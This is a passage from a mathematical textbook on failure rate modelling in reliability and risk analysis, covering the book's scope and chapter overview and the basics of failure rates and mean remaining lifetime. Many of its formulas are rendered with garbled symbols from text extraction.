Special Cases .............................................................................. 233 9.4 Chapter Summary .................................................................................. 235 10 Demographic and Biological Applications.................................................. 237 10.1 Introduction............................................................................................ 237 10.2 Unobserved Overall Resource ............................................................... 242 10.3 Mortality Model with Anti-ageing......................................................... 246 10.4 Mortality Rate and Lifesaving ............................................................... 250 10.5 The Strehler–Mildvan Model and Generalizations ................................ 252 10.6 ‘Quality-of-life Transformation’............................................................ 253 10.7 Stochastic Ordering for Mortality Rates ................................................ 255 10.7.1 Specific Population Modelling ................................................... 256 10.7.2 Definitions of Life Expectancy................................................... 260 10.7.3 Comparison of Life Expectancies............................................... 263 10.7.4 Further Inequalities..................................................................... 265 10.8 Tail of Longevity ................................................................................... 268 10.9 Chapter Summary .................................................................................. 273 References ...................................................................................................... ....275 Index ................................................................................................................. ...287 1 Introduction 1.1 Aim and Scope of the Book As the title suggests, this book is devoted to failure rate modelling for reliability analysis and other disciplines that employ the notion of the failure rate or its equivalents. The conditional hazard in risk analysis and the mortality rate in demography are the relevant examples of these equivalent concepts. Although the main focus in the text is on this crucial characteristic, our presentation cannot be restricted to failure rate analysis alone; other important reliability measures are studied as well. We consider non-negative random variables, which are called lifetimes. The time to failure of an engineering component or a system is a lifetime, as is the time to death of an organism. The number of casualties after an accident and the wear accumulated by a degrading system are also positive random variables. Although we deal here mostly with engineering applications, the reliability-based approach to lifetime modelling for organisms is one of the important topics discussed in the last chapter of this book. Obviously, the human organism is not a machine, but nothing prevents us from using stochastic reasoning developed in reliability theory for lifespan modelling of organisms. The presented models focus on reliability applications. However, some of the considered methods are already formulated in terms of risk and safety assessment (e.g., Chapters 8 and 10); most of the others can also be used for this purpose after a suitable adjustment. It is well known that the failure rate function can be interpreted as the probability (risk) of failure in an infinitesimal unit interval of time. Owing to this interpretation and some other properties, its importance in reliability, survival analysis, risk analysis and other disciplines is hard to overestimate. For example, the increasing failure rate of an object is an indication of its deterioration or ageing of some kind, which is an important property in various applications. Many engineering (especially mechanical) items are characterized by the processes of “wear and tear”, and therefore their lifetimes are described by an increasing failure rate. The failure (mortality) rate of humans at adult ages is also increasing. The empirical Gompertz law of human mortality (Gompertz, 1825) defines the exponentially increasing mortality rate. On the other hand, the constant failure rate is usually an indication 2 Failure Rate Modelling for Reliability and Risk of a non-ageing property, whereas a decreasing failure rate can describe, e.g., a period of “infant mortality” when early failures, bugs, etc., are eliminated or corrected. Therefore, the shape of the failure rate plays an important role in reliability analysis. Figure 1.1 shows probably the most popular graph in reliability applications: a typical life cycle failure rate function (bathtub shape) of an engineering object. Note that, the usage period with a near-constant failure rate is mostly typical for various electronic items, whereas mechanical and electro-mechanical devices are usually subject to processes of wear. When the lifetime distribution function F (t ) is absolutely continuous, the failure rate λ (t ) can be defined as F ′(t ) /(1 − F (t )) . In this case, there exists a simple, well-known exponential representation for F (t ) (Section 2.1). It defines an important characterization of the distribution function via the failure rate λ (t ) . Moreover, the failure rate contains information on the chances of failure of an operating object in the next sufficiently small interval of time. Therefore, the shape of λ (t ) is often much more informative in the described sense than, for example, the shapes of the distribution function or of the probability density function. (t) Infant Wearing mortality Usage period t Figure 1.1. The bathtub curve Many tools and approaches developed in reliability engineering are naturally formulated via the failure rate concept. For example, a well-known proportional hazards model that is widely used in reliability and survival analysis is defined directly in terms of the failure rate; the hazard (failure) rate ordering used in stochastic comparisons is the ordering of the failure rates; many software reliability models are directly formulated by means of the corresponding failure rates (see various models of Chapter 9). For example, each ‘bug’, in accordance with the Jelinski– Moranda model (Jelinski and Moranda, 1972), has an independent input of a fixed size into the failure rate of the software. Although the emphasis in this book is on the failure rate, one cannot describe this topic without considering other reliability characteristics. The mean remaining Introduction 3 lifetime is the first on this list, and we pay considerable attention to describing and discussing its properties. In many applications, the stochastic description of ageing by means of the mean remaining lifetime function that is decreasing with time is more appropriate than the description of ageing via the corresponding increasing failure rate. In this text, we consider several generalizations of the ‘classical’ notion of the failure rate λ (t ) . One of them is the random failure rate. Engineering and biological objects usually operate in a random environment. This random environment can be described by a stochastic process Z t , t ≥ 0 or by a random variable Z as a special case. Therefore, the failure rate, which corresponds to a lifetime T , can also be considered as a stochastic process λ (t , Z t ) or a random variable λ (t , Z ) . These functions should be understood conditionally on realizations λ (t | z (u ), 0 ≤ u ≤ t ) and λ (t | Z = z ) , respectively. Similar considerations are valid for the corresponding distribution functions F (t , Z t ) and F (t , Z ) . What happens when we try to average these characteristics and obtain the marginal (observed) distribution functions and failure rates? The following is obviously true for the distribution functions: F (t ) = E[ F (t , Z t )], F (t ) = E[ F (t , Z )] , where the expectations should be obtained with respect to Z t , t ≥ 0 and Z , respectively. Note that explicit computations in accordance with these formulas are usually cumbersome and can be performed only for some special cases. On the other hand, it is clear that as the failure rate λ (t ) is a conditional characteristic (on the condition that an object did not fail up to t ), the corresponding conditioning should be performed, i.e., λ (t ) = E[λ (t , Z t ) | T > t ], λ (t ) = E[λ (t , Z ) | T > t ] . This ‘slight’ difference can be decisive, as it not only complicates the computational part of the problem but often changes the important monotonicity properties of λ (t ) (compared with the monotonicity properties of the family of conditional failure rates λ (t | Z = z ) ). For example, when λ (t | Z = z ) is an increasing power function for each z (the Weibull law) and Z is a gamma-distributed random variable, λ (t ) appears to have an upside-down bathtub shape: this function is equal to 0 at t = 0 , then increases to reach a maximum at some point in time and eventually monotonically decreases to 0 as t → ∞ . Another relevant example is when the conditional failure rate λ (t | Z = z ) is an exponentially increasing function (the Gompertz law). Assuming again that Z is gamma-distributed, it is easy to derive (Chapter 6) that λ (t ) tends to a constant as t → ∞ . The dramatic changes in the shapes of failure rates in these examples and in many other instances should be taken into account in theoretical analysis and in practical applications. Note that the second example provides a possible explanation for the mortality rate plateau of humans observed recently for the ‘oldest-old’ populations in developed countries (Thatcher, 1999). According to these results, the mortality rate of centenarians is either increasing very slowly or not increasing at all, which contradicts the Gompertz law of human mortality. Another important generalization of the conventional failure rate λ (t ) deals with repairable systems and considers the failure rate of a repairable component as an intensity process (stochastic intensity) λt , t ≥ 0 . The ‘randomness’ of the failure 4 Failure Rate Modelling for Reliability and Risk rate in this case is due to random times of repair. This approach is in line with the modern description of point processes (see, e.g., Daley and Vere–Jones, 1988, and Aven and Jensen, 1999). Assume for simplicity that the repair action is perfect and instantaneous. This means that after each repair a component is ‘as good as new’. Let the governing failure rate for this component be λ (t ) . Then the intensity process at time t for this simplest case of perfect repair is defined as λt = λ (t − T− ) , where T− denotes the random time of the last repair (renewal) before t . Therefore, the probability of a failure in [t , t + dt ) is λ (t − T− )dt , which should also be understood conditionally on realizations of T− . The main focus in Chapters 4 and 5 is on considering the intensity processes for the case of imperfect (general) repair when a component after the repair action is not as good as new. Various models of imperfect repair and of imperfect maintenance can be found in the literature (see, for example, the recent book by Wang and Pham, 2006, and references therein). We investigate only the most popular models of this kind and also discuss our recent findings in this field. This book provides a comprehensive treatment of different reliability models focused on properties of the failure rate and other relevant reliability characteristics. Our presentation combines classical and recent results of other authors with our research findings of the last 10 to 15 years. We discuss the subject mostly using necessary tools and approaches and do not intend to present a self-sufficient textbook on reliability theory. The choice of topics is driven by the research interests of the author. The recent excellent encyclopaedic books by Lai and Xie (2006) and Marshall and Olkin (2007) give a broad picture of modern mathematical reliability theory and also present up-to-date reference sources. Along with the classical text by Barlow and Proschan (1975), an excellent textbook by Rausand and Hoyland (2004) and a mathematically oriented reliability monograph by Aven and Jensen (1999), these books can be considered the first-choice complementary or further reading. In this book, we understand risk (hazard) as a chance (probability) of failure or of another undesirable, harmful event. The consequences of these events (Chapter 8) can also be taken into account to comply with the classical definition of risk (Bedford and Cooke, 2001). The book is mostly targeted at researchers and ‘quantitative engineers’. The first two chapters, however, can be used by undergraduate students as a supplement to a basic course in reliability. This means that the reader should be familiar with the basics of reliability theory. The other parts can form a basis for graduate courses on imperfect (general) repair and on mixture failure rate modelling for students in probability, statistics and engineering. The last chapter presents a collection of stochastic, reliability-based approaches to lifespan modelling and ageing concepts of organisms and can be useful to mathematical biologists and demographers. We follow a general convention regarding the monotonicity properties of a function. We say that a function is increasing (decreasing) if it is not decreasing (increasing). We also prefer the term “failure rate” to the equivalent “hazard rate”, although many authors use the second term. Among other considerations, this choice is supported by the fact that the most popular nonparametric classes of dis- Introduction 5 tributions in applications are the increasing failure rate (IFR) and the decreasing failure rate (DFR) classes. Note that all necessary acronyms and nomenclatures are defined below in the appropriate parts of the text, when the corresponding symbol or abbreviation is used for the first time. For convenience, where appropriate, these explanations are often repeated later on in the text as well. This means that each section is selfsufficient in terms of notation. 1.2 Brief Overview Chapter 2 is devoted to reliability basics and can be viewed as a brief introduction to some reliability notions and results. We pay considerable attention to the shapes of the failure rate and of the mean remaining life function as these topics are crucial for the rest of the book. The properties of the reversed failure rate have recently attracted noticeable interest. In the last section, definitions and the main properties for the reversed failure rate and related characteristics are considered. Note that, in this chapter, we consider only those facts, definitions and properties that are necessary for further presentation and do not aim at a general introduction to reliability theory. Chapter 3 deals with two meaningful generalizations of the main exponential formula of reliability and survival analysis: the exponential representation of lifetime distributions with covariates and an analogue of the exponential representation for the multivariate (bivariate) case. The first meaningful generalization is used in Chapter 6 on mixture modelling and in the last chapter on applications to demography and biological ageing. Other chapters do not directly rely on this material and therefore can be read independently. The bivariate setting is studied in Chapter 7 only, where the competing risks model of Chapter 3 is generalized to the case of correlated covariates. In Chapter 4, we present a brief introduction to the theory of point processes that is necessary for considering models of repairable systems. We define the stochastic intensity (intensity process) and the equivalent complete intensity function for the point processes that usually describe the operation of repairable systems. It is well known that renewal processes and alternating renewal processes are used for this purpose. Therefore, a repair action in these models is considered to be perfect, i.e., returning a system to the as good as new state. This assumption is not always true, as repair in real life is usually imperfect. Minimal repair is the simplest case of imperfect repair, and therefore we consider this topic in detail. Specifically, information-based minimal repair is studied using some meaningful practical examples. The simplest models for minimal repair in heterogeneous populations are also considered. Chapter 5 is devoted to repairable systems with imperfect (general) repair. When repair is perfect, the age of an item is just the time elapsed since the last repair, which is modelled by a renewal process. If it is minimal, then the age is equal to the time since a repairable item started operating. The point process of minimal repairs is the non-homogeneous Poisson process. When the repair is imperfect in a more general sense than minimal, the corresponding equivalent or virtual age 6 Failure Rate Modelling for Reliability and Risk should be defined. We describe the concept of virtual age for different settings and apply it to reliability modelling of repairable systems. An important feature of this concept is the assumption that the repair does not change the shape of the baseline failure rate and only the ‘starting age’ changes after each repair. We develop the renewal theory for this setting and also consider the asymptotic properties of the corresponding imperfect repair process. We prove that, as t → ∞ , this process converges to an ordinary renewal process. Chapter 6 provides a comprehensive treatment of mixture failure rate modelling in reliability analysis. We present the relevant theory and discuss various applications. It is well known that mixtures of distributions with decreasing failure rate always have a decreasing failure rate. On the other hand, mixtures of increasing failure rate distributions can decrease at least in some intervals of time. As the latter distributions usually model lifetimes governed by ageing processes, this means that the operation of mixing can dramatically change the pattern of ageing, e.g., from ‘positive ageing’ to ‘negative ageing’. We prove that the mixture failure rate is ‘bent down’ due to “the weakest populations are dying out first” effect. Among other results, it is shown that if mixing random variables are ordered in the sense of likelihood ratio ordering, the mixture failure rates are ordered accordingly. We also define the operation of mixing for the mean remaining lifetime function and study its properties. In Chapter 7, we present the asymptotic theory for mixture failure rates. It is mostly based on Finkelstein and Esaulova (2006, 2008). The chapter is rather technical and can be omitted by a less mathematically oriented reader. We obtain explicit asymptotic results for the mixture failure rate as t → ∞ . A general class of distributions is suggested that contains as specific cases the additive, multiplicative and accelerated life models that are widely used in practice. The most surprising is the result for the accelerated life model: when the support of the mixing distribution is [0, ∞) , the mixture failure rate for this model converges to 0 as t → ∞ and does not depend on the baseline distribution. The ultimate behaviour of λ (t ) for other models, however, depends on a number of factors, specifically the baseline distribution. The univariate approach developed in this chapter is applied to the bivariate competing risks model. The components in the corresponding series system are dependent via a shared frailty parameter. An interesting feature of this model is that this dependence ‘vanishes’ as t → ∞ . This result may have an analogue in the life sciences, e.g., for statistical analysis of correlated life spans of twins. Chapter 8 deals with several specific problems where the failure rate can be obtained (constructed) directly as an exact or approximate relationship. Along with meaningful heuristic considerations, exact solutions and approaches are also discussed. Most examples are based on the operation of thinning of the Poisson process (Cox and Isham, 1980) or on equivalent reasoning. Among other settings, we apply the developed approach to obtaining the survival probability of an object moving in a plane and encountering moving or (and) fixed obstacles. In the ‘safety at sea’ application terminology, each foundering or collision results in a failure (accident) with a predetermined probability. It is shown that this setting can be reduced to the one-dimensional case. We assume that the field of fixed obstacles in the plane is described by the spatial non-homogeneous Poisson process. A spatialtemporal process is used for modelling moving obstacles. As another example, we Introduction 7 also introduce the notion of multiple availability when an object must be available at all (random) instants of demand. We obtain the relevant probabilities using the thinning of the corresponding Poisson process and consider various generalizations. Chapter 9 is devoted to software reliability modelling, and specifically to a discussion of some of the software failure rate models. It should be considered not as a comprehensive study of the subject, but rather a brief illustration of methods and approaches developed in the previous chapters. We consider several well-known empirical models for software failure rates, which can be described in terms of the corresponding stochastic intensity processes. Note that most of the models of this kind considered in the literature are based on very strong assumptions. A different approach, based on our stochastic model, which is similar to the model used for constructing the failure rate for spatial survival, is also discussed. Chapter 10 is focused on another application of reliability-based reasoning. Reliability theory possesses the well-developed ‘machinery’ for stochastic modelling of ageing and failures in technical objects, which can be successfully applied to lifespan modelling of humans and other organisms. Thus, not only the final event (e.g., death) can be considered, but the process, which eventually results in this event, as well. Several simple stochastic approaches to this modelling are described in this chapter. We revise the original Strehler–Mildvan (1960) model that was widely applied to human mortality data and show that from a mathematical point of view it is valid only under the assumption of the Poisson property of the point process of shocks (demands for energy). It also turns out that the thinning of the Poisson process described in Chapter 8 can be used for the probabilistic explanation of the lifesaving procedure, which results in decrease in mortality rates of contemporary human populations. We apply the concept of stochastic ordering to stochastic comparisons of different populations. An important feature of this modelling is that the mortality rate in demographic studies is usually not only a function of age (as in reliability) but of calendar time as well. Finally, in the last section, the tail of longevity for human populations is discussed. This notion is somehow close to the notion of the mean remaining lifetime, but the corresponding definition is based on two population distributions: on an ‘ordinary’ lifetime distribution and on the distribution of time to death of the last survivor. 2 Failure Rate and Mean Remaining Lifetime Reliability engineering, survival analysis and other disciplines mostly deal with positive random variables, which are often called lifetimes. As a random variable, a lifetime is completely characterized by its distribution function. A realization of a lifetime is usually manifested by a failure, death or some other ‘end event’. Therefore, for example, information on the probability of failure of an operating item in the next (usually sufficiently small) interval of time is really important in reliability analysis. The failure (hazard) rate function O (t ) defines this probability of interest. If this function is increasing, then our object is usually degrading in some suitable probabilistic sense, as the conditional probability of failure in the corresponding infinitesimal interval of time increases with time. For example, it is well known that the failure (mortality) rate of adult humans increases exponentially with time; the failure rate of many mechanically wearing devices is also increasing. Thus, understanding and analysing the shape of the failure rate is an essential part of reliability and lifetime data analysis. Similar to the distribution function F (t ) , the failure rate also completely characterizes the corresponding random variable. It is well known that there exists a simple, meaningful exponential representation for the absolutely continuous distribution function in terms of the corresponding failure rate (Section 2.1). The study of the failure rate function, the main topic of this book, is impossible without considering other reliability measures. The mean remaining (residual) lifetime function is probably first among these; it also plays a crucial role in the aforementioned disciplines. These functions complement each other nicely: the failure rate gives a description of the random variable in an infinitesimal interval of time, whereas the mean remaining lifetime describes it in the whole remaining interval of time. Moreover, these two functions are connected via the corresponding differential equation and asymptotically, as time approaches infinity, one tends to the reciprocal of the other (Section 2.4.3). In this introductory chapter, we consider only some basic facts, definitions and properties. We will use well-known results and approaches to the extent sufficient for the presentation of other chapters. The topic of reversed failure rate, which has attracted considerable interest recently, and the rather specific Section 2.4.3 on the limiting behaviour of the mean remaining life function can be skipped at first reading. 10 Failure Rate Modelling for Reliability and Risk This chapter is, in fact, a mathematically oriented introduction to some of the main reliability notions and approaches. Recent books by Lai and Xie (2006), Marshall and Olkin (2007), a classic monograph by Barlow and Proschan (1975) and a useful textbook by Rausand and Hoyland (2004) can be used for further reading and as sources of numerous reliability-related results and facts. 2.1 Failure Rate Basics Let T t 0 be a continuous lifetime random variable with a cumulative distribution function (Cdf) ­Pr[T d t ], t t 0 , ® t  0. ¯0, F (t ) Unless stated specifically, we will implicitly assume that this distribution is ‘proper’, i.e., F 1 (1) f , and that F (0) 0 . The support of F (t ) will usually be [0, f) , although other intervals of ƒ  [0, f) will also be used. We can view T as some time to failure (death) of a technical device (organism), but other interpretations and parameterizations are possible as well. Inter-arrival times in a sequence of ordered events or the amount of monotonically accumulated damage on the failure of a mechanical item are also relevant examples of lifetimes. Denote the expectation of the lifetime variable E[T ] by m and assume that it is finite, i.e., m  f . Assume also that F (t ) is absolutely continuous, and therefore the probability density function (pdf) f (t ) F c(t ) exists (almost everywhere). Recall that a function g (t ) is absolutely continuous in some interval [a, b], 0 d a  b d f , if for every positive number H , no matter how small, there is a positive number G such that whenever a sequence of disjoint subintervals [ xk , y k ], k 1,2,..., n satisfies n ¦| y k  xk |  G , 1 the following sum is bounded by H : n ¦| g ( y )  g (x ) |  H . k k 1 Owing to this definition, the uniform continuity in [a, b] , and therefore the ‘ordinary’ continuity of the function g (t ) in this interval, immediately follows. In accordance with the definition of E[T ] and integrating by parts: t m ³ lim t of xf ( x)dx 0 t º ª lim t of «tF (t )  ³ F ( x)dx » »¼ «¬ 0 Failure Rate and Mean Remaining Lifetime 11 t º ª limt o f « tF (t )  ³ F ( x)dx » , 0 ¼» ¬« where F (t ) 1  F (t ) Pr[T ! t ] denotes the corresponding survival (reliability) function. As 0  m  f , it is easy to conclude that f m ³ F ( x)dx , (2.1) 0 which is a well-known fact for lifetime distributions. Thus, the area under the survival curve defines the mean of T . Let an item with a lifetime T and a Cdf F (t ) start operating at t 0 and let it be operable (alive) at time t x. The remaining (residual) lifetime is of significant interest in reliability and survival analysis. Denote the corresponding random variable by Tx . The Cdf Fx (t ) is obtained using the law of conditional probability (on the condition that an item is operable at t x ), i.e., Fx (t ) Pr[Tx d t ] Pr[ x  T d x  t ] Pr[T ! x] F ( x  t )  F ( x) . F ( x) (2.2) The corresponding conditional survival probability is given by Fx (t ) Pr[Tx ! t ] F (x  t) . F ( x) (2.3) Although the main focus of this book is on failure rate modelling, analysis of the remaining lifetime, and especially of the mean remaining lifetime (MRL), is often almost as important. We will use Equations (2.2) and (2.3) for definitions of the next section. Now we are able to define the notion of failure rate, which is crucial for reliability analysis and other disciplines. Consider an interval of time (t , t  't ] . We are interested in the probability of failure in this interval given that it did not occur before in [0, t ]. This probability can be interpreted as the risk of failure (or of some other harmful event) in (t , t  't ] given the stated condition. Using a relationship similar to (2.2), i.e., Pr[t  T d t  't | T ! t ] Pr[t  T d t  't ] Pr[T ! t ] F (t  't )  F (t ) . F (t ) 12 Failure Rate Modelling for Reliability and Risk Consider the following quotient: O't (t ) F (t  't )  F (t ) F (t )'t and define the failure rate O (t ) as its limit when 't o 0 . As the pdf f (t ) exists, Pr[t  T d t  't | T ! t ] 't F (t  't )  F (t ) f (t ) lim 't o0 . F (t )'t F (t ) O (t ) lim 't o0 (2.4) Therefore, when '(t ) is sufficiently small, Pr[t  T d t  't | T ! t ] | O (t )'t , which gives a very popular and important interpretation of O (t )'t as an approximate conditional probability of a failure in (t , t  't ] . Note that f (t )'t defines the corresponding approximate unconditional probability of a failure in (t , t  't ] . It is very likely that, owing to this interpretation, failure rate plays a pivotal role in reliability analysis, survival analysis and other fields. In actuarial and demographic disciplines, it is usually called the force of mortality or the mortality rate. To be precise, the force of mortality in demographic literature is usually the infinitesimal version ( 't o 0 ), whereas the term mortality rate more often describes the discrete version when 't is set equal to a calendar year. For convenience, we will always use the term mortality rate as an equivalent of failure rate when discussing demographic applications. Chapter 10 will be devoted entirely to some aspects of mortality rate modelling. Note that, when considering real populations, the mortality rate becomes a function of two variables: age t and calendar time x . This creates many interesting problems in the corresponding stochastic analysis. We will briefly discuss some of them in this chapter. For a general introduction to mathematical demography, where the mortality rate also plays a pivotal role, the interested reader is referred to Keyfitz and Casewell (2005). Definition 2.1. The failure rate O (t ) , which corresponds to the absolutely continuous Cdf F (t ) , is defined by Equation (2.4) and is approximately equal to the probability of a failure in a small unit interval of time (t , t  't ] given that no failure has occurred in [0, t ] . The following theorem shows that the failure rate uniquely defines the absolutely continuous lifetime Cdf: Theorem 2.1. Exponential Representation of F (t ) by Means of the Failure Rate Let T be a lifetime random variable with the Cdf F (t ) and the pdf f (t ) . Failure Rate and Mean Remaining Lifetime 13 Then · § t F (t ) 1  exp¨  ³ O (u )du ¸ . ¸ ¨ ¹ © 0 (2.5) Proof. As f (t ) F ' (t ) , we can view Equation (2.4) as an elementary first-order differential equation with the initial condition F (0) 0 . Integration of this equation results in the main exponential formula of reliability and survival analysis (2.5). Ŷ The importance of this formula is hard to overestimate as it presents a simple characterization of F (t ) via the failure rate. Therefore, along with the Cdf F (t ) and the pdf f (t ) , the failure rate O (t ) uniquely describes a lifetime T . At many instances, however, this characterization is more convenient, which is often due to the meaningful probabilistic interpretation of O (t )'t and the simplicity of Equation (2.5). Equation (2.5) has been derived for an absolutely continuous Cdf. Does the probability of failure in a small unit interval of time (which always exists) define the corresponding distribution function of a random variable under weaker assumptions? This question will be addressed in the next chapter. Remark 2.1 Equation (2.4) can be used for defining the simplest empirical estimator for the failure rate. Assume that there are N !! 1 independent, statistically identical items (i.e., having the same Cdf) that started operating in a common environment at t 0 . A population of this kind in the life sciences is often called a cohort. Failure times of items are recorded, and therefore the number of operating items N (t ), N (0) N at each instant of time t t 0 is known. Thus, for N o f , Equation (2.4) is equivalent to O (t ) lim 't o0 N (t  't )  N (t ) , N (t )'t (2.6) which can be used as an estimate for the failure rate for finite N and 't , whereas ( N (t  't )  N (t )) / N (t ) is an estimate for the probability of failure in (t , t  't ] . 2.2 Mean Remaining Lifetime Basics How much longer will an item of age x live? This question is vital for reliability analysis, survival analysis, actuarial applications and other disciplines. For example, how much time does an average person aged 65 (which is the typical retirement age in most countries) have left to live? The distribution of this remaining lifetime Tx , T0 { T is given by Equation (2.2). Note that this equation defines a conditional probability, i.e., the probability on condition that the item is operating at time t x . Assume, as previously, that E[T ] { m  f . Denote E[Tt ] { m(t ) , m(0) m , where, for the sake of notation, the variable x in Equation (2.2) has been interchanged with the variable t . The function m(t ) is called the mean remaining (residual) life (MRL) function. It defines the mean lifetime left for an item of age t . 14 Failure Rate Modelling for Reliability and Risk Along with the failure rate, it plays a crucial role in reliability analysis, survival analysis, demography and other disciplines. In demography, for example, this important population characteristic is called the “life expectancy at time t ” and in risk analysis the term “mean excess time” is often used. Whereas the failure rate function at t provides information on a random variable T about a small interval after t , the MRL function at t considers information about the whole remaining interval (t, f) (Guess and Proschan, 1988). Therefore, these two characteristics complement each other, and reliability analysis of, e.g., engineering systems is often carried out with respect to both of them. It will be shown in this section that, similar to the failure rate, the MRL function also uniquely defines the Cdf of T and that the corresponding exponential representation is also valid. In accordance with Equations (2.1) and (2.3), m(t ) E[T  t | T ! t ] E[Tt ] f ³ F (u)du t 0 f ³ F (u)du t F (t ) . (2.7) Assuming that the failure rate exists and using Equation (2.5), Equation (2.7) can be transformed into ½° ­° t u exp ³0 ®°¯ ³t O ( x)dx¾°¿du . f m(t ) It easily follows from these equations that the MRL function, which corresponds to the constant failure rate O , is also constant and is equal to 1 / O . Definition 2.2. The MRL function m(t ) E[Tt ] , m(0) { m  f , is defined by Equation (2.7), obtained by integrating the survival function of the remaining lifetime Tt . Alternatively, integrating by parts, similar to (2.1), f ³ uf (u)du t f ³ F (u)du  tF (t ) . t Therefore, the last integral in (2.7) can be obtained from this equation, which results in the equivalent expression f ³ uf (u)du m(t ) t F (t ) t. (2.8) Failure Rate and Mean Remaining Lifetime 15 Equation (2.8) can be sometimes helpful in reliability analysis. Assume that m(t ) is differentiable. Differentiation in (2.7) yields f mc(t ) O (t ) ³ F (u )du  F (t ) t F (t ) O (t )m(t )  1 . (2.9) From Equation (2.9) the following relationship between the failure rate and the MRL function is obtained: mc(t )  1 . m(t ) O (t ) (2.10) This simple but meaningful equation plays an important role in analysing the shapes of the MRL and failure rate functions. Consider now the following lifetime distribution function: t ³ F (u)du Fe (t ) 0 , m (2.11) where, as usual, m(0) { m . The right-hand side of Equation (2.11) defines an equilibrium distribution, which plays an important role in renewal theory (Ross, 1996). This distribution will help us to prove the following simple but meaningful theorem. An elegant idea of the proof belongs to Meilijson (1972). Theorem 2.2. Exponential Representation of F (t ) by Means of the MRL Function Let T be a lifetime random variable with the Cdf F (t ) , the pdf f (t ) and with finite first moment: m m(0)  f . Then F (t ) ­° t 1 ½° m du ¾ . exp® ³ m(t ) °¯ 0 m(u ) °¿ Proof. It follows from Equation (2.11) that f t Fe (t ) 1  ³ 0 f F (u )du ³ F (u)du 0 ³ F (u)du t m (2.12) 16 Failure Rate Modelling for Reliability and Risk and that f e (t ) F (t ) / m . Therefore, the failure rate, which corresponds to the equilibrium distribution Fe (t ) , is Oe (t ) f e (t ) Fe (t ) 1 . m(t ) (2.13) Applying Theorem 2.1 to Fe (t ) results in · § t 1 exp¨  du ¸ . ¸ ¨ © 0 m(u ) ¹ ³ Fe (t ) (2.14) Therefore, the corresponding pdf is f e (t ) · § t 1 1 exp¨  du ¸ . ¸ ¨ m(t ) © 0 m(u ) ¹ ³ Finally, substitution of this density into the equation F (t ) tion (2.12). mf e (t ) results in EquaŶ On differentiating Equation (2.12), we obtain the pdf f (t ) that is also expressed in terms of the MRL function m(t ) (Lai and Xie, 2006), i.e., f (t ) · § t 1 m(mc(t )  1) ¨ exp du ¸ . 2 ³ ¸ ¨ m (t ) © 0 m(u ) ¹ Theorem 2.2 has meaningful implications. Firstly, it defines another useful exponential representation of the absolutely continuous distribution F (t ) . Whereas (2.5) is obtained in terms of the failure rate O (t ) , Equation (2.12) is expressed in terms of the MRL function m(t ) . Secondly, it shows that, under certain assumptions, O (t ) and 1 / m(t ) could be close, at least in some sense to be properly defined. This topic will be discussed in the next section, where the shapes of the failure rate and the MRL functions will be studied. Equation (2.12) can be used for ‘constructing’ distribution functions when m(t ) is specified. Zahedi (1991) shows that in this case, differentiable functions m(t ) should satisfy the following conditions: x m(t ) ! 0, t  [0, f) ; x m(0)  f ; mc(t ) ! 1, t  (0, f) ; x f x 1 ³ m(u) du 0 f; Failure Rate and Mean Remaining Lifetime 17 The first two conditions are obvious. The third condition is obtained from Equation (2.10) and states that O (t )m(t ) is strictly positive for t ! 0 . Note that, m(0)O (0) 0 when O (0) 0 . The last condition states that the cumulative failure rate t f 0 0 ³ Oe (u)du 1 ³ m(u) du of equilibrium distribution (2.11) should tend to infinity as t o f . This condition ensures a proper Cdf, as limt o f Fe (t ) 0 in this case. In accordance with Equation (2.3) and exponential representation (2.5), the survival function for Tt can be written as Ft ( x) ­° t  x ½° Pr[Tt ! x] exp® ³ O (u )du ¾ . °¯ t °¿ (2.15) This equation means that the failure rate, which corresponds to the remaining lifetime Tt , is a shift of the baseline failure rate, namely Ot ( x) O (t  x) . (2.16) Assume that O (t ) is an increasing (decreasing) function. Note that, in this book, as usual, by increasing (decreasing) we actually mean non-decreasing (nonincreasing). The first simple observation based on Equation (2.15) tells us that in this case, for each fixed x ! 0 , the function Ft (x) is decreasing (increasing), and therefore, in accordance with (2.7), the MRL function m(t ) is decreasing (increasing). The inverse is generally not true, i.e., a decreasing m(t ) does not necessarily lead to an increasing O (t ) . This topic will be addressed in Section 2.4. The operation of conditioning in the definition of the MRL function is performed with respect to the event that states that an item is operating at time t . In this approach, an item is considered as a ‘black box’ without any additional information on its state. Alternatively, we can define the information-based MRL function, which makes sense in many situations when this information is available. The following example (Finkelstein, 2001) illustrates this approach. Example 2.1 Information-based MRL Consider a parallel system of two components with independent, identically distributed (i.i.d.) exponential lifetimes defined by the failure rate O . The survival function of this structure is F (t ) 2 exp{Ot}  exp{2Ot} , and therefore, the corresponding failure rate is defined by O (t ) 2O exp{Ot}  2O exp{2Ot} . 2 exp{Ot}  exp{2Ot} 18 Failure Rate Modelling for Reliability and Risk It can easily be seen that O (t ) monotonically increases from O (0) 0 to O as t o f . The corresponding MRL function, in accordance with (2.7), is m(t ) 1 (4  exp{Ot}) . O (4  2 exp{Ot}) This function decreases from 3 / 2O to 1 / O as t o f . Therefore, the following bounds are obvious for t  (0, f) : 1 O  m(t )  3 2O m(0) . (2.17) These inequalities can be interpreted in the following way. The left-hand side defines the information-based MRL when observation of the system confirms that only one component is operating at t  (0, f) , whereas the right-hand side is the information-based MRL when observation confirms that both components are operating. Thus the values of the information-based MRL are the bounds for m(t ) in this simple case. For the case of independent components with different failure rates O1 , O2 ( O1  O2 ), the result of the comparison appears to be dependent on the time of observation. The corresponding survival function is defined as F (t ) exp{O1t}  exp{O2t}  exp{(O1  O2 )t} , and the system’s failure rate is O (t ) O1 exp{O1t}  O2 exp{O2t}  (O1  O2 ) exp{(O1  O2 )t} . exp{O1t}  exp{O2t}  exp{(O1  O2 )t} It can be shown that the function O (t ) ( O (0) 0 ) is monotonically increasing in [0, tmax ] and monotonically decreasing in (tmax , f) , asymptotically approaching O1 from above as t o f , as stated in Barlow and Proschan (1975). It crosses the line y O1 at t tc  t max . The value of tmax is uniquely obtained from the equation O22 exp{O1t}  O12 exp{O2t} (O1  O2 ) 2 ; O1 z O2 . As in the previous case, the MRL function can be explicitly obtained, but we are more interested in discussing the information-based bounds. When both components are operating at t ! 0 , then, similar to the right-hand inequality in (2.17), the MRL function m(t ) is bounded from above by m(0) : m(t )  O1 1 O2 1  . O1  O2 O2 O1  O2 O1 Failure Rate and Mean Remaining Lifetime 19 Now, let only the second component be operating at the time of observation. As this component is the worst one (O2  O1 ) , the system’s MRL should be better: m(t ) ! 1 / O2 . On the other hand, if only the first component is operable at time t , then m(t ) d 1 O1 , t  [tc , f) . (2.18) This inequality immediately follows by combining the shape of the failure rate (i.e., O (t ) is larger than O1 for t ! tc ), Equation (2.15) and the definition of the MRL function in (2.7). It is also clear that m(t ) ! 1 / O1 for sufficiently small values of t , as two components are 